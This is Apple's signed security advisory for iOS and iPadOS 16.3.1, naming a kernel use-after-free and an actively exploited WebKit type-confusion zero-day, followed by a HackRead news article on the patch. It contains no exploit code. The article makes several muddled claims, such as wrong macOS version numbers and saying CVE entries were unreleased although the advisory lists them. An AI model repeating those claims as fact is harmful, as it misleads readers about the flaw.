    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-1 iOS 16.3.1 and iPadOS 16.3.1iOS 16.3.1 and iPadOS 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213635.KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of GoogleProject ZeroWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, iPad mini5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAdditional recognitionWe would like to acknowledge The Citizen Lab at The University ofToronto’s Munk School for their assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.3.1 and iPadOS 16.3.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDkeNxk00xAA6vBGZD0tv5wi0q4B8jiJ3oz5/Om05bfUPLziPG1MvWzcFZYpQmdS+OJWq219S6uDt0m0ojPLkUgcxQ5OmQ/ViwMbawZaVOpe6aIem33iGkWFyGhvgU7EDLwJcIaXd7pMxfkI28AZUgd8Brf/UXnt1Ja13+ixDnrGT2C+3G+kst17+PZZ0bZj+MwtxDuPW6uLDegjTmjNXzWuo/mSm2MChzoygsbUOPa0Y29OhmgRCbLu/nOCcPcWRk5iYlSZU5efZ7yqpjMdIt36TCD/yAd0uttebgnKMMLNjQjDAbPj0j+5NiAmYx75DYksYCnbs+LRMJ9Fik7lA6ihCavJwgq/PZ5NKR/xA6utkpxQatpT4Swmh2mDabJJK08GT+UsTfnxRgwPnyOEcSBAg7IaMc6BxIUiVrosp4u+ZYO0QnR6z0CgI+2zqTb+HcCjOpmCYwDz8pvyO7zZF1SdZZpc6GXsxX/Aq5FahSeWQY1x4i0qbiy0AsP7JBcMbAOStKPV14Q9UJ1iTbxI1aaLYxwWmawhN2iCnfjOc+nTC6X5gNtXSF+TRtgGUO8Wr039PgF7MqJ+24UYjf0IdD9tCRaIHBGpUwFKsHhSk/hRsGi4Yov9U5Bu1BKGvTHwx714vW6p/vjKajjiP6ljtr7TDwkq1SRPSecX3jrrAGkNoJOw+0xOW5s==RxGI-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-1

By Deeba Ahmed
If you are using an Apple product, it is time to update it right now and make sure the automatic updates are enabled.
This is a post from HackRead.com Read the original post: Update Now: iOS Devices Receive Vital Security Updates from Apple

Apple has released an emergency security patch to fix a critical vulnerability that has been targeting all iOS devices, including iPhones, Macbooks, and Tablets.

Apple has released urgent security patches for a newly detected zero-day vulnerability that can be exploited to hack vulnerable iOS devices, including Macs, iPhones, and iPads.

The vulnerability (tracked as CVE-2023-23529) was found in the WebKit framework of the browser. So, if maliciously designed web content is processed, it would allow arbitrary code execution after an unsuspecting user visits a compromised URL.

“Apple is aware of a report that this issue may have been actively exploited,” the company noted. This explains why the iPhone maker released patches urgently for its flagship devices.

Still, the impact is extensive, as from the iPhone 8 to all subsequent iPhone models will be impacted, as well as every model of iPad Pro, the iPad Air 3rd generation and above, iPad 5th generation and above, and iPad mini 5th generation.

**Which Devices are Impacted?**

An unidentified researcher discovered the flaw, which has been patched with the latest edition of security updates. Apple didn’t specify how this vulnerability could be exploited.

In fact, it is the first time a zero-day has been defined as a newly discovered security flaw. It is a WebKit confusion issue. Moreover, all Macs running Ventura will be impacted. Fixes for all these versions were released in the security update.

**Security Update Details**

The small point update released by Apple on Monday contains WebKit security patches for iOS 16.3.1, iPadOS 16.3.1, and macOS 11.2.1 to fix a zero-day bug. The updates are available for iOS 16, iPadOS 16, macOS Ventura, and the latest edition of Apple Safari, as well as the preceding versions of Big Sur and macOS Monterey.

In addition, Apple released patches for tvOS 16.3.2 and watchOS 9.3.1. The company has yet to release the CVE entries, though. It is also unclear if a fix will be released for iOS 15 devices. If you haven’t updated your device, please do so immediately to stay safe.

1.  Microsoft fixes 6 Active 0-Day Windows Flaws
2.  Israeli Spyware Vendor Exploiting Chrome 0day
3.  Apple Debuts Lockdown Mode to Prevent Spying
4.  Apple Bug bounty: Hack Apple and earn big bucks

Tag

#webkit